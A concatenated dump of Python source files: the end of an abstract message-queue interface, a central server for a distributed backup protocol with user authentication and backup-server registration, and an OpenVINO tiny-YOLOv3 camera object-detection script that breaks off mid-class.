        :param receiver: a receiver to receive incoming messages.
        """
        # Run the blocking listen() on a daemon thread so this call returns
        # immediately and the listener cannot keep the process alive.
        listener = threading.Thread(target=self.listen, args=(correlation_id, receiver))
        listener.daemon = True
        listener.start()

    def to_string(self) -> str:
        """
        Gets a string representation of the object.

        :return: a string representation of the object.
        """
        return "[{}]".format(self.get_name())

    def __str__(self):
        """
        Gets a string representation of the object.

        :return: a string representation of the object.
        """
        return self.to_string()

    @abstractmethod
    def close(self, correlation_id: Optional[str]):
        """
        Closes component and frees used resources.

        :param correlation_id: (optional) transaction id to trace execution through call chain.
        """

    @abstractmethod
    def clear(self, correlation_id: Optional[str]):
        """
        Clears component state.

        :param correlation_id: (optional) transaction id to trace execution through call chain.
        """

    @abstractmethod
    def read_message_count(self) -> int:
        """
        Reads the current number of messages in the queue to be delivered.

        :return: a number of messages in the queue.
        """

    @abstractmethod
    def send(self, correlation_id: Optional[str], envelop: MessageEnvelope):
        """
        Sends a message into the queue.

        :param correlation_id: (optional) transaction id to trace execution through call chain.
        :param envelop: a message envelop to be sent.
        """

    @abstractmethod
    def peek(self, correlation_id: Optional[str]) -> MessageEnvelope:
        """
        Peeks a single incoming message from the queue without removing it.
        If there are no messages available in the queue it returns `None`.

        :param correlation_id: (optional) transaction id to trace execution through call chain.
        :return: a peeked message or `None`.
        """

    @abstractmethod
    def peek_batch(self, correlation_id: Optional[str], message_count: int) -> List[MessageEnvelope]:
        """
        Peeks multiple incoming messages from the queue without removing them.
        If there are no messages available in the queue it returns an empty list.

        :param correlation_id: (optional) transaction id to trace execution through call chain.
        :param message_count: a maximum number of messages to peek.
        :return: a list of peeked messages
        """

    @abstractmethod
    def receive(self, correlation_id: Optional[str], wait_timeout: int) -> MessageEnvelope:
        """
        Receives an incoming message and removes it from the queue.

        :param correlation_id: (optional) transaction id to trace execution through call chain.
        :param wait_timeout: a timeout in milliseconds to wait for a message to come.
        :return: a received message or `None`.
        """

    @abstractmethod
    def renew_lock(self, message: MessageEnvelope, lock_timeout: int):
        """
        Renews a lock on a message that makes it invisible from other receivers in the queue.
        This method is usually used to extend the message processing time.

        :param message: a message to extend its lock.
        :param lock_timeout: a locking timeout in milliseconds.
        """

    @abstractmethod
    def complete(self, message: MessageEnvelope):
        """
        Permanently removes a message from the queue.
        This method is usually used to remove the message after successful processing.

        :param message: a message to remove.
        """

    @abstractmethod
    def abandon(self, message: MessageEnvelope):
        """
        Returns a message into the queue and makes it available for all subscribers to receive it again.
        This method is usually used to return a message which could not be processed at the moment
        to repeat the attempt. Messages that cause unrecoverable errors shall be removed permanently
        or/and sent to a dead letter queue.

        :param message: a message to return.
        """

    @abstractmethod
    def move_to_dead_letter(self, message: MessageEnvelope):
        """
        Permanently removes a message from the queue and sends it to dead letter queue.

        :param message: a message to be removed.
        """

    @abstractmethod
    def listen(self, correlation_id: Optional[str], receiver: IMessageReceiver):
        """
        Listens for incoming messages and blocks the current thread until queue is closed.

        :param correlation_id: (optional) transaction id to trace execution through call chain.
        :param receiver: a receiver to receive incoming messages.
        """

    @abstractmethod
    def end_listen(self, correlation_id: Optional[str]):
        """
        Ends listening for incoming messages.
        When this method is called **listen** unblocks the thread and execution continues.

        :param correlation_id: (optional) transaction id to trace execution through call chain.
        """
|
CS.py | #!/usr/bin/env python3
import socket, sys, getopt, os
from signal import signal, pause, SIGINT, SIGTERM, SIG_IGN
from pickle import load, dump
from multiprocessing import Process
from multiprocessing.managers import SyncManager
from lib.server import tcp_server, udp_server, udp_client
from lib.utils import (read_bytes_until, DEFAULT_CS_PORT, CS_KNOWN_BS_SAVEFILE,
CS_VALID_USERS_SAVEFILE, CS_DIRS_LOCATION_SAVEFILE,
backup_dict_to_file, restore_dict_from_file,
ignore_sigint, get_best_ip)
# Function to deal with any protocol unexpected error
def unexpected_command(my_socket):
    """Reply with the generic protocol error message. TCP and UDP compatible."""
    my_socket.sendall(b"ERR\n")
# Code to deal with queries from BS (UDP server)
def deal_with_udp(udp_socket, known_bs):
    """Serve BS registration (REG) and unregistration (UNR) requests over UDP.

    Runs forever in a child process; exits cleanly when the parent calls
    .terminate() (SIGTERM).

    :param udp_socket: bound, unconnected UDP server socket
    :param known_bs: shared dict {("ip_BS", "port_BS"): backup counter}
    """
    def signal_handler(_signum, _frame):
        udp_socket.close()
        exit(0)
    # ignore CTRL-C; handle .terminate() from parent
    signal(SIGINT, SIG_IGN)
    signal(SIGTERM, signal_handler)
    while True:
        response, address = udp_socket.recvfrom(32)
        args = response.decode().split(" ")
        command = args[0]
        args = args[1:]
        if command == "REG":
            add_bs(known_bs, args, udp_socket, address)
        elif command == "UNR":
            remove_bs(known_bs, args, udp_socket, address)
        else:
            # BUGFIX: unexpected_command() uses sendall(), which raises
            # OSError on this unconnected UDP socket (the loop uses
            # recvfrom); reply to the actual sender with sendto instead.
            udp_socket.sendto("ERR\n".encode(), address)
def add_bs(known_bs, args, udp_socket, address):
    """Register a BS server and answer "RGR <status>" to the sender.

    status: OK (registered), NOK (already registered), ERR (bad arguments).

    :param known_bs: shared dict {(ip, port): backup counter}
    :param args: datagram fields after the REG keyword
    :param udp_socket: UDP server socket used to reply
    :param address: sender address for the reply
    """
    status = "ERR"
    # BUGFIX: validate the argument count *before* indexing args[1];
    # a malformed datagram with fewer fields used to raise IndexError
    # and kill the UDP worker process.
    if len(args) < 2:
        print("Error in arguments received from BS server: {}".format(" ".join(args)))
    else:
        ip_bs = args[0]
        port_bs = args[1].split("\n")[0]
        if len(args) != 2 or port_bs.isdigit() is False:
            print("Error in arguments received from BS server: {} {}".format(ip_bs, port_bs))
        elif (ip_bs, port_bs) in known_bs:
            print("Error: Already added BS {}".format(ip_bs))
            status = "NOK"
        else:
            # Counter starts at 0: it tracks how often this BS was picked
            # for backups, so load can be balanced.
            known_bs[(ip_bs, port_bs)] = 0
            backup_dict_to_file(known_bs, CS_KNOWN_BS_SAVEFILE)
            status = "OK"
            print("-> BS added:\n - ip: {}\n - port: {}\n".format(ip_bs, port_bs))
    udp_socket.sendto("RGR {}\n".format(status).encode(), address)
def remove_bs(known_bs, args, udp_socket, address):
    """Unregister a BS server and answer "UAR <status>" to the sender.

    status: OK (removed), NOK (unknown BS), ERR (bad arguments).

    :param known_bs: shared dict {(ip, port): backup counter}
    :param args: datagram fields after the UNR keyword
    :param udp_socket: UDP server socket used to reply
    :param address: sender address for the reply
    """
    # BUGFIX: statuses no longer embed their own "\n" — the format string
    # below already terminates the reply, so the old values produced a
    # double newline ("UAR OK\n\n"), unlike add_bs's single-"\n" replies.
    status = "ERR"
    # BUGFIX: validate the argument count *before* indexing args[1];
    # a malformed datagram used to raise IndexError and kill the worker.
    if len(args) < 2:
        print("Error in arguments received from BS server: {}".format(" ".join(args)))
    else:
        ip_bs = args[0]
        port_bs = args[1].split("\n")[0]
        if len(args) != 2 or port_bs.isdigit() is False:
            print("Error in arguments received from BS server: {} {}".format(ip_bs, port_bs))
        elif (ip_bs, port_bs) not in known_bs:
            print("Error: User {} does not exist".format(ip_bs))
            status = "NOK"
        else:
            del known_bs[(ip_bs, port_bs)]
            backup_dict_to_file(known_bs, CS_KNOWN_BS_SAVEFILE)
            status = "OK"
            print("-> BS removed:\n - ip: {}\n - port: {}\n".format(ip_bs, port_bs))
    udp_socket.sendto("UAR {}\n".format(status).encode(), address)
def deal_with_tcp(tcp_socket, valid_users, dirs_location, known_bs):
    """Accept TCP clients forever, forking one worker process per connection.

    :param tcp_socket: listening TCP server socket
    :param valid_users: shared dict {"user": password}
    :param dirs_location: shared dict {(username, "folder"): (ipBS, portBS)}
    :param known_bs: shared dict {("ip_BS", "port_BS"): backup counter}
    """
    def signal_handler(_signum, _frame):
        # SIGTERM from the parent: release the listening socket and exit.
        tcp_socket.close()
        exit(0)
    def deal_with_client(client, valid_users, dirs_location, known_bs):
        """ Code / function for forked worker """
        conn = client[0]
        logged_in = False # this var is False or contains the user id
        # Dispatch one command per iteration; every command except AUT
        # requires a prior successful AUT and closes the session afterwards.
        while True:
            try:
                command = read_bytes_until(conn, " \n")
                if command == "AUT":
                    logged_in, password = authenticate_user(valid_users, conn)
                elif command == "DLU" and logged_in:
                    delete_user(logged_in, conn, dirs_location, valid_users)
                    break
                elif command == "BCK" and logged_in:
                    backup_dir(logged_in, conn, known_bs, password, dirs_location)
                    break
                elif command == "RST" and logged_in:
                    restore_dir(logged_in, conn, dirs_location)
                    break
                elif command == "LSD" and logged_in:
                    list_user_dirs(logged_in, conn, dirs_location)
                    break
                elif command == "LSF" and logged_in:
                    list_files_in_dir(logged_in, conn, dirs_location)
                    break
                elif command == "DEL" and logged_in:
                    delete_dir(logged_in, conn, dirs_location)
                    break
                else:
                    unexpected_command(conn)
            except (BrokenPipeError, ConnectionResetError):
                print("{}: connection closed\n".format(client[1]))
                exit(0)
        conn.close() # end of code
    # Mask CTRL-C, handle SIGTERM (terminate, from father)
    signal(SIGINT, SIG_IGN)
    signal(SIGTERM, signal_handler)
    while True:
        client = tcp_socket.accept()
        p_client = Process(target=deal_with_client, args=(client, valid_users, dirs_location, known_bs), daemon=True)
        p_client.start()
def authenticate_user(valid_users, conn):
    """Handle AUT: register or verify a user and reply "AUR <status>".

    :param valid_users: shared dict {"user": password}
    :param conn: TCP connection to read credentials from and reply on
    :return: (username, password) on success, (False, False) on failure
    """
    username = read_bytes_until(conn, " ")
    password = read_bytes_until(conn, "\n")
    print("-> AUT {} {}".format(username, password))
    if username not in valid_users:
        # First time we see this user: register and persist the credentials.
        valid_users[username] = password
        backup_dict_to_file(valid_users, CS_VALID_USERS_SAVEFILE)
        print("New user: {}".format(username))
        status, result = "NEW", (username, password)
    elif valid_users[username] == password:
        print("User {} logged in sucessfully".format(username))
        status, result = "OK", (username, password)
    else:
        print("Password received does not match")
        status, result = "NOK", (False, False)
    conn.sendall("AUR {}\n".format(status).encode())
    return result
def delete_user(username, conn, dirs_location, valid_users):
    """Handle DLU: delete the user unless directories are still stored for them.

    Replies "DLR OK" or "DLR NOK" on `conn`.
    """
    print(">> DLU")
    # Refuse deletion while any (user, folder) entry still belongs to them.
    still_has_dirs = any(owner == username for (owner, _folder) in dict(dirs_location))
    if still_has_dirs:
        print("There is still information stored for user\n")
        status = "NOK\n"
    else:
        del valid_users[username]
        backup_dict_to_file(valid_users, CS_VALID_USERS_SAVEFILE)
        print("User {} deleted sucessfully\n".format(username))
        status = "OK\n"
    conn.sendall(("DLR " + status).encode())
def backup_dir(username, conn, known_bs, password, dirs_location):
    """Handle BCK: decide where a user's directory gets backed up.

    If the directory is already assigned to a BS, query that BS for its file
    listing and reply with only the files whose metadata changed.  Otherwise
    pick the least-used BS, register the user there if needed, record the
    assignment, and reply with the full file list.  Replies "BKR EOF" when no
    BS is available.
    """
    flag = 0
    folder = read_bytes_until(conn, " ")
    nr_user_files = int(read_bytes_until(conn, " "))
    print(">> BCK {} {}".format(folder, str(nr_user_files)))
    user_dict = {}  # {"filename": [date, time, size]}
    bs_dict = {}  # {"filename": [date, time, size]}
    string_of_files = ""
    registered_in_bs = 0
    files_user = read_bytes_until(conn, "\n").split()
    # Each file is described by 4 consecutive tokens: name, date, time, size.
    for i in range(nr_user_files):
        filename = files_user[4*i]
        date = files_user[4*i+1]
        time = files_user[4*i+2]
        size = files_user[4*i+3]
        user_dict[filename] = [date, time, size]
        string_of_files += " {} {} {} {}".format(filename, date, time, size)
    if (username, folder) in dirs_location:
        # Directory already backed up once: ask its BS what it stores.
        flag = 1
        ip_bs = dirs_location[(username, folder)][0]
        port_bs = dirs_location[(username, folder)][1]
        print("BCK {} {} {} {}".format(username, folder, ip_bs, port_bs))
        bs_socket = udp_client(ip_bs, int(port_bs))
        bs_socket.sendall("LSF {} {}\n".format(username, folder).encode())
        response = bs_socket.recv(2048).decode().split()
        bs_socket.close()
        command = response[0]
        if command != "LFD":
            print("Error in command")
            exit(0)
        nr_bs_files = int(response[1])
        for i in range(nr_bs_files):
            filename = response[2 + 4*i]
            date = response[2 + 4*i + 1]
            time = response[2 + 4*i + 2]
            size = response[2 + 4*i + 3]
            bs_dict[filename] = [date, time, size]
        # Keep only files present on both sides whose metadata differ.
        final_string_of_files = ""
        nr_files_final = 0
        for user_file in user_dict:
            for bs_file in bs_dict:
                if user_file == bs_file and user_dict[user_file] != bs_dict[bs_file]:
                    # NOTE(review): this appends the BS's (stale) metadata for
                    # the changed file; presumably the user's new metadata
                    # (user_dict[user_file]) was intended — confirm against the
                    # protocol spec before changing.
                    final_string_of_files += " {} {} {} {}".format(user_file, bs_dict[user_file][0], bs_dict[user_file][1], bs_dict[user_file][2])
                    nr_files_final += 1
        if nr_files_final == 0:
            print("No files to backup\n")
        response = "BKR {} {} {}{}\n".format(ip_bs, port_bs, nr_files_final, final_string_of_files)
        conn.sendall(response.encode())
    if flag == 0:
        # First backup of this directory: choose a BS for it.
        ip_bs = ""
        flag_first_user = 1
        if not known_bs:
            print("No BS available to backup [BKR EOF]\n")
            conn.sendall("BKR EOF\n".encode())
            return
        # Pick the BS that has served the fewest backups (first key wins ties).
        known_bs_temp = dict(known_bs)
        for (ip, port) in known_bs_temp:
            if flag_first_user:
                ip_bs, port_bs = (ip, port)
                flag_first_user = 0
            elif known_bs_temp[(ip, port)] < known_bs_temp[(ip_bs, port_bs)]:
                ip_bs, port_bs = (ip, port)
        known_bs[(ip_bs, port_bs)] += 1
        print("BS with ip: {} and port: {} was chosen for backup".format(ip_bs, port_bs))
        # The user only needs to be introduced (LSU) to a BS once.
        for (user, directory) in dict(dirs_location):
            if dirs_location[(user, directory)] == (ip_bs, port_bs) and user == username:
                print("User {} is already registered in BS with ip: {} and port: {}\n".format(username, ip_bs, port_bs))
                registered_in_bs = 1
                break
        dirs_location[(username, folder)] = (ip_bs, port_bs)
        backup_dict_to_file(dirs_location, CS_DIRS_LOCATION_SAVEFILE)
        if not registered_in_bs:
            bs_socket = udp_client(ip_bs, int(port_bs))
            response = "LSU {} {}\n".format(username, password)
            bs_socket.sendall(response.encode())
            command, status = bs_socket.recv(32).decode()[:-1].split()
            bs_socket.close()
            if command != "LUR":
                print("Error in command\n")
                exit(0)
            # BUGFIX: `status` comes from str.split(), which strips whitespace,
            # so the old comparisons against "NOK\n"/"ERR\n" could never match
            # and BS errors were silently treated as success.
            elif status == "NOK":
                print("Already knew user\n")
                exit(0)
            elif status == "ERR":
                print("Error in arguments sent from CS to BS\n")
                exit(0)
            else:
                print("User {} was added to BS with ip: {} and port: {} sucessfully\n".format(username, ip_bs, port_bs))
        response = "BKR {} {} {}{}\n".format(ip_bs, port_bs, nr_user_files, string_of_files)
        conn.sendall(response.encode())
#check conditions of error
def restore_dir(username, conn, dirs_location):
    """Handle RST: tell the client which BS holds the requested directory.

    Replies "RSR <ip> <port>" when the directory is known, "RSR EOF" otherwise.
    """
    folder = read_bytes_until(conn, "\n")
    print("Restore {}".format(folder))
    if (username, folder) not in dirs_location:
        print("RSR EOF")
        conn.sendall("RSR EOF\n".encode())
        return
    print("Entered")
    ip_bs, port_bs = dirs_location[(username, folder)]
    reply = "RSR {} {}\n".format(ip_bs, port_bs)
    print(reply)
    conn.sendall(reply.encode())
def list_user_dirs(username, conn, dirs_location):
    """Handle LSD: reply "LDR <count> <folder> <folder> ..." with the
    directories stored for this user."""
    print(">> LSD")
    owned = []
    if dirs_location:
        for (owner, folder) in dict(dirs_location):
            if owner == username:
                owned.append(folder)
                print(folder)
    reply = "LDR {} {}\n".format(len(owned), "".join(f + " " for f in owned))
    print(reply)
    conn.sendall(reply.encode())
def list_files_in_dir(username, conn, dirs_location):
    """Handle LSF: relay a backed-up directory's file listing to the client.

    Queries the BS that stores the directory and forwards its answer as
    "LFD <ip> <port> <n> <file date time size>...".  Replies "LFD NOK" when
    the user has no such directory.
    """
    folder = read_bytes_until(conn, " \n")
    print(">> LSF {}".format(folder))
    if (username, folder) not in dirs_location:
        conn.sendall("LFD NOK\n".encode())
        return
    ip_bs, port_bs = dirs_location[(username, folder)]
    bs_socket = udp_client(ip_bs, int(port_bs))
    bs_socket.sendall("LSF {} {}\n".format(username, folder).encode())
    words = bs_socket.recv(2048).decode().split()
    bs_socket.close()
    if words[0] != "LFD":
        print("Error in command\n")
        exit(0)
    nr_bs_files = int(words[1])
    conn.sendall("LFD {} {} {}".format(ip_bs, port_bs, nr_bs_files).encode())
    # Forward each 4-token file record (name, date, time, size) verbatim.
    for i in range(nr_bs_files):
        record = words[2 + 4*i: 2 + 4*i + 4]
        conn.sendall(" {} {} {} {}".format(*record).encode())
    conn.sendall("\n".encode())
def delete_dir(username, conn, dirs_location):
    """Handle DEL: ask the responsible BS to delete a directory, reply DDR.

    Replies "DDR OK" when the BS confirms deletion, "DDR NOK" when the folder
    is unknown (here or on the BS), and "ERR" on a BS protocol violation.
    """
    print(">> DEL")
    status_del = "NOK"
    flag = 0
    folder = read_bytes_until(conn, " \n")
    if (username, folder) in dirs_location:
        flag = 1
        ip_bs = dirs_location[(username, folder)][0]
        port_bs = dirs_location[(username, folder)][1]
        bs_socket = udp_client(ip_bs, int(port_bs))
        bs_socket.sendall("DLB {} {}\n".format(username, folder).encode())
        command, status = bs_socket.recv(8).decode().split(" ")
        # BUGFIX: the BS reply is newline-terminated ("DBR NOK\n" is exactly
        # the 8 bytes read), so the raw token was "NOK\n" and never matched
        # "NOK" below — a BS failure fell into the success branch and the
        # directory record was deleted anyway.
        status = status.rstrip("\n")
        bs_socket.close()
        if command != "DBR":
            print("Error in protocol\n")
            conn.sendall("ERR\n".encode())
            # NOTE(review): a "DDR NOK" is still sent below after this "ERR"
            # reply; confirm whether the client really expects both messages.
        else:
            if status == "NOK":
                print("No such folder exists in the chosen BS\n")
            else:
                status_del = "OK"
                del dirs_location[(username, folder)]
                backup_dict_to_file(dirs_location, CS_DIRS_LOCATION_SAVEFILE)
                print("Directory {} was sucessfully deleted\n".format(folder))
        response = "DDR {}\n".format(status_del)
        conn.sendall(response.encode())
    if flag == 0:
        print("No such folder for the user {}\n".format(username))
        response = "DDR {}\n".format(status_del)
        conn.sendall(response.encode())
def main():
    """CS entry point: restore persisted state, start the UDP (BS-facing) and
    TCP (user-facing) workers, then wait until interrupted and persist state
    on the way out.

    Accepts -p <port> on the command line; otherwise uses DEFAULT_CS_PORT.
    """
    manager = SyncManager()
    manager.start(ignore_sigint)
    # Manager-backed dicts are shared safely between the worker processes.
    known_bs = manager.dict() # {("ip_BS", "port_BS"): counter}
    valid_users = manager.dict() # {"user": password}
    dirs_location = manager.dict() # {(username, "folder"): (ipBS, portBS)}
    my_address = get_best_ip()
    my_port = DEFAULT_CS_PORT
    try:
        a = getopt.getopt(sys.argv[1:], "p:")[0]
    except getopt.GetoptError as error:
        print(error)
        exit(2)
    for opt, arg in a:
        if opt == '-p':
            my_port = int(arg)
    print("My address is {}\n".format(my_address))
    udp_receiver = udp_server(my_address, my_port)
    tcp_receiver = tcp_server(my_address, my_port)
    # Restore any state persisted by a previous run.
    if os.path.isfile(CS_KNOWN_BS_SAVEFILE):
        known_bs.update(restore_dict_from_file(CS_KNOWN_BS_SAVEFILE))
    if os.path.isfile(CS_VALID_USERS_SAVEFILE):
        valid_users.update(restore_dict_from_file(CS_VALID_USERS_SAVEFILE))
    if os.path.isfile(CS_DIRS_LOCATION_SAVEFILE):
        dirs_location.update(restore_dict_from_file(CS_DIRS_LOCATION_SAVEFILE))
    try:
        # "Forking"
        p_udp = Process(target=deal_with_udp, args=(udp_receiver, known_bs))
        p_tcp = Process(target=deal_with_tcp, args=(tcp_receiver, valid_users, dirs_location, known_bs))
        p_udp.start()
        p_tcp.start()
        pause()
    except KeyboardInterrupt:
        pass
    finally:
        # Orderly shutdown: close sockets, stop children, persist state.
        tcp_receiver.close()
        udp_receiver.close()
        p_tcp.terminate()
        p_udp.terminate()
        p_tcp.join()
        p_udp.join()
        backup_dict_to_file(known_bs, CS_KNOWN_BS_SAVEFILE)
        backup_dict_to_file(valid_users, CS_VALID_USERS_SAVEFILE)
        backup_dict_to_file(dirs_location, CS_DIRS_LOCATION_SAVEFILE)
        print()
if __name__ == '__main__':
    main()
|
openvino_tiny-yolov3_MultiStick_test.py | import sys, os, cv2, time, heapq, argparse
import numpy as np, math
try:
from armv7l.openvino.inference_engine import IENetwork, IEPlugin
except:
from openvino.inference_engine import IENetwork, IEPlugin
import multiprocessing as mp
from time import sleep
import threading
# YOLOv3 output grid sizes (cells per side) for the detection scales.
yolo_scale_13 = 13
yolo_scale_26 = 26
yolo_scale_52 = 52

classes = 80  # number of COCO classes
coords = 4    # box coordinates per prediction (x, y, w, h)
num = 3       # anchor boxes per grid cell
# Flattened (width, height) anchor pairs for tiny-YOLOv3 on COCO.
anchors = [10,14, 23,27, 37,58, 81,82, 135,169, 344,319]

# COCO class labels, indexed by class id.
LABELS = ("person", "bicycle", "car", "motorbike", "aeroplane",
          "bus", "train", "truck", "boat", "traffic light",
          "fire hydrant", "stop sign", "parking meter", "bench", "bird",
          "cat", "dog", "horse", "sheep", "cow",
          "elephant", "bear", "zebra", "giraffe", "backpack",
          "umbrella", "handbag", "tie", "suitcase", "frisbee",
          "skis", "snowboard", "sports ball", "kite", "baseball bat",
          "baseball glove", "skateboard", "surfboard","tennis racket", "bottle",
          "wine glass", "cup", "fork", "knife", "spoon",
          "bowl", "banana", "apple", "sandwich", "orange",
          "broccoli", "carrot", "hot dog", "pizza", "donut",
          "cake", "chair", "sofa", "pottedplant", "bed",
          "diningtable", "toilet", "tvmonitor", "laptop", "mouse",
          "remote", "keyboard", "cell phone", "microwave", "oven",
          "toaster", "sink", "refrigerator", "book", "clock",
          "vase", "scissors", "teddy bear", "hair drier", "toothbrush")

# Drawing parameters for the overlay (BGR colors).
label_text_color = (255, 255, 255)
label_background_color = (125, 175, 75)
box_color = (255, 128, 0)
box_thickness = 1

# Shared mutable module state used across camThread and __main__.
processes = []        # child processes spawned by __main__
fps = ""              # playback FPS overlay text
detectfps = ""        # detection FPS overlay text
framecount = 0        # frames displayed since last FPS update
detectframecount = 0  # detection batches received since last FPS update
time1 = 0             # accumulated instantaneous FPS samples
time2 = 0             # accumulated wall-clock seconds
lastresults = None    # last detection list, redrawn when no fresh results
def EntryIndex(side, lcoords, lclasses, location, entry):
    """Return the flat index of one value in a flattened YOLO output blob.

    `location` encodes (anchor n, cell) as n * side**2 + cell; `entry`
    selects the channel (coordinate, objectness, or class probability).
    """
    cells = side * side
    n, cell = divmod(location, cells)
    return n * cells * (lcoords + lclasses + 1) + entry * cells + cell
class DetectionObject():
    """Axis-aligned detection box in original-image pixel coordinates."""

    # Class-level defaults; every one is overwritten per instance in __init__.
    xmin = 0
    ymin = 0
    xmax = 0
    ymax = 0
    class_id = 0
    confidence = 0.0

    def __init__(self, x, y, h, w, class_id, confidence, h_scale, w_scale):
        # (x, y) is the box center and (w, h) its size, both in resized-image
        # units; *_scale maps them back to the original image resolution.
        half_w = w / 2
        half_h = h / 2
        self.xmin = int((x - half_w) * w_scale)
        self.ymin = int((y - half_h) * h_scale)
        self.xmax = int(self.xmin + w * w_scale)
        self.ymax = int(self.ymin + h * h_scale)
        self.class_id = class_id
        self.confidence = confidence
def IntersectionOverUnion(box_1, box_2):
    """Return the IoU of two boxes exposing xmin/ymin/xmax/ymax attributes."""
    overlap_w = min(box_1.xmax, box_2.xmax) - max(box_1.xmin, box_2.xmin)
    overlap_h = min(box_1.ymax, box_2.ymax) - max(box_1.ymin, box_2.ymin)
    # Disjoint boxes yield a negative extent on at least one axis.
    if overlap_w < 0.0 or overlap_h < 0.0:
        area_of_overlap = 0.0
    else:
        area_of_overlap = overlap_w * overlap_h
    area_1 = (box_1.ymax - box_1.ymin) * (box_1.xmax - box_1.xmin)
    area_2 = (box_2.ymax - box_2.ymin) * (box_2.xmax - box_2.xmin)
    area_of_union = area_1 + area_2 - area_of_overlap
    # Guard against degenerate (zero-area) unions.
    if area_of_union <= 0.0:
        return 0.0
    return area_of_overlap / area_of_union
def ParseYOLOV3Output(blob, resized_im_h, resized_im_w, original_im_h, original_im_w, threshold, objects):
    """Decode one NCHW YOLOv3 output blob into DetectionObjects.

    Detections above `threshold` are appended to `objects` (mutated in place)
    and the same list is returned. Box coordinates are scaled back to the
    original image resolution.
    """
    out_blob_h = blob.shape[2]
    out_blob_w = blob.shape[3]
    # The grid size identifies which detection scale this blob belongs to.
    side = out_blob_h
    anchor_offset = 0
    # Select the anchor pairs for this scale.
    # NOTE(review): any other grid size (e.g. 52) falls through with offset 0;
    # presumably fine for tiny-YOLOv3, which emits only 13/26 — confirm if a
    # full YOLOv3 model is ever loaded.
    if side == yolo_scale_13:
        anchor_offset = 2 * 3
    elif side == yolo_scale_26:
        anchor_offset = 2 * 0
    side_square = side * side
    output_blob = blob.flatten()
    for i in range(side_square):
        row = int(i / side)
        col = int(i % side)
        for n in range(num):
            # Flat indices of the objectness score and the box-coords base.
            obj_index = EntryIndex(side, coords, classes, n * side * side + i, coords)
            box_index = EntryIndex(side, coords, classes, n * side * side + i, 0)
            scale = output_blob[obj_index]
            if (scale < threshold):
                continue
            # Box center in resized-image pixels; size = anchor * exp(pred).
            x = (col + output_blob[box_index + 0 * side_square]) / side * resized_im_w
            y = (row + output_blob[box_index + 1 * side_square]) / side * resized_im_h
            height = math.exp(output_blob[box_index + 3 * side_square]) * anchors[anchor_offset + 2 * n + 1]
            width = math.exp(output_blob[box_index + 2 * side_square]) * anchors[anchor_offset + 2 * n]
            for j in range(classes):
                class_index = EntryIndex(side, coords, classes, n * side_square + i, coords + 1 + j)
                # Class confidence = objectness * class probability.
                prob = scale * output_blob[class_index]
                if prob < threshold:
                    continue
                obj = DetectionObject(x, y, height, width, j, prob, (original_im_h / resized_im_h), (original_im_w / resized_im_w))
                objects.append(obj)
    return objects
def camThread(LABELS, results, frameBuffer, camera_width, camera_height, vidfps):
    """Capture frames from the USB camera, feed them to the inference process
    via `frameBuffer`, overlay the newest detections from `results`, and
    display the annotated frames. Runs forever; exits when 'q' is pressed.
    """
    global fps
    global detectfps
    global lastresults
    global framecount
    global detectframecount
    global time1
    global time2
    global cam
    global window_name

    cam = cv2.VideoCapture(0)
    if cam.isOpened() != True:
        print("USB Camera Open Error!!!")
        sys.exit(0)
    cam.set(cv2.CAP_PROP_FPS, vidfps)
    cam.set(cv2.CAP_PROP_FRAME_WIDTH, camera_width)
    cam.set(cv2.CAP_PROP_FRAME_HEIGHT, camera_height)
    window_name = "USB Camera"
    wait_key_time = 1

    # Alternative movie-file input kept for reference:
    #cam = cv2.VideoCapture("data/input/testvideo4.mp4")
    #camera_width = int(cam.get(cv2.CAP_PROP_FRAME_WIDTH))
    #camera_height = int(cam.get(cv2.CAP_PROP_FRAME_HEIGHT))
    #frame_count = int(cam.get(cv2.CAP_PROP_FRAME_COUNT))
    #window_name = "Movie File"
    #wait_key_time = int(1000 / vidfps)

    cv2.namedWindow(window_name, cv2.WINDOW_AUTOSIZE)

    while True:
        t1 = time.perf_counter()

        # USB Camera Stream Read
        s, color_image = cam.read()
        if not s:
            continue
        # Drop the oldest queued frame so inference always sees a recent one.
        if frameBuffer.full():
            frameBuffer.get()
        height = color_image.shape[0]
        width = color_image.shape[1]
        frameBuffer.put(color_image.copy())

        if not results.empty():
            # Fresh detections available: draw them and remember them.
            objects = results.get(False)
            detectframecount += 1
            for obj in objects:
                if obj.confidence < 0.2:
                    continue
                label = obj.class_id
                confidence = obj.confidence
                if confidence > 0.2:
                    label_text = LABELS[label] + " (" + "{:.1f}".format(confidence * 100) + "%)"
                    cv2.rectangle(color_image, (obj.xmin, obj.ymin), (obj.xmax, obj.ymax), box_color, box_thickness)
                    cv2.putText(color_image, label_text, (obj.xmin, obj.ymin - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.6, label_text_color, 1)
            lastresults = objects
        else:
            # No new results this frame: redraw the previous detections.
            if not isinstance(lastresults, type(None)):
                for obj in lastresults:
                    if obj.confidence < 0.2:
                        continue
                    label = obj.class_id
                    confidence = obj.confidence
                    if confidence > 0.2:
                        label_text = LABELS[label] + " (" + "{:.1f}".format(confidence * 100) + "%)"
                        cv2.rectangle(color_image, (obj.xmin, obj.ymin), (obj.xmax, obj.ymax), box_color, box_thickness)
                        cv2.putText(color_image, label_text, (obj.xmin, obj.ymin - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.6, label_text_color, 1)

        cv2.putText(color_image, fps, (width-170,15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (38,0,255), 1, cv2.LINE_AA)
        cv2.putText(color_image, detectfps, (width-170,30), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (38,0,255), 1, cv2.LINE_AA)
        cv2.imshow(window_name, cv2.resize(color_image, (width, height)))

        if cv2.waitKey(wait_key_time)&0xFF == ord('q'):
            sys.exit(0)

        ## Print FPS
        # Refresh the overlay strings every 15 displayed frames.
        framecount += 1
        if framecount >= 15:
            fps = "(Playback) {:.1f} FPS".format(time1/15)
            detectfps = "(Detection) {:.1f} FPS".format(detectframecount/time2)
            framecount = 0
            detectframecount = 0
            time1 = 0
            time2 = 0
        t2 = time.perf_counter()
        elapsedTime = t2-t1
        time1 += 1/elapsedTime
        time2 += elapsedTime
def searchlist(l, x, notfoundvalue=-1):
    """Return the index of the first occurrence of `x` in `l`, or
    `notfoundvalue` if `x` is absent.

    EAFP: a single list.index() scan instead of the original `x in l`
    membership test followed by a second .index() scan.
    """
    try:
        return l.index(x)
    except ValueError:
        return notfoundvalue
def async_infer(ncsworker):
    """Drive one NcsWorker forever, repeatedly issuing async inference steps."""
    #ncsworker.skip_frame_measurement()
    while True:
        ncsworker.predict_async()
class NcsWorker(object):
    """One MYRIAD (Neural Compute Stick) device running tiny-YOLOv3
